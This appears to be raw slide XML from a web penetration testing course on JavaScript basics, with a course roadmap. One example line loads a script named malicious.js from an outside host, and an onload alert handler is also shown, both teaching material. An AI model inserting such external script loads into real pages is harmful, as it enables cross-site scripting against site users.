                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;img src="images/logo.gif" onload="javascript:alert('Loaded');"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can also be loaded from another document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;script src=http://professionallyevil.com/malicious.js&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>It is common to see any one or more of these in the same HTML page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A9295B5-9A82-43F9-A0CB-DC212357141A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="10004"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4954051" y="1327673"/>
            <a:ext cx="3970874" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148485"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54638" y="2514600"/>
            <a:ext cx="3765550" cy="137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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript Fundamentals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149507" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1645920"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each statement is a command to the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are differences in how each browser interprets some JavaScript particulars… that can be frustrating, but let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s cover the most common aspects of JavaScript here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The entire language is case sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Combines related statements into blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each block is delimited by {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>if (location.port != 443) { </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>alert("No SSL support!")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use a // for single line comments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>// This code causes burning!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Multi-line comments use the /* */ characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>/* This code was written by</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Jason Wood and James Jardine */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149508" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6096000" y="3061970"/>
            <a:ext cx="2233613" cy="181610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600" dirty="0"/>
              <a:t>This snippet determines if the web page was accessed on port 443 and pops up an alert dialog box on the browser if it wasn't.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="149509" name="Straight Connector 7"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4495800" y="3474720"/>
            <a:ext cx="1600200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxn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1041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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Client-Side Discovery</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Capture the Flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150533" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6573672"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>    Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Conditional Statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151555" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1630680"/>
            <a:ext cx="4191000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If…Else Statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
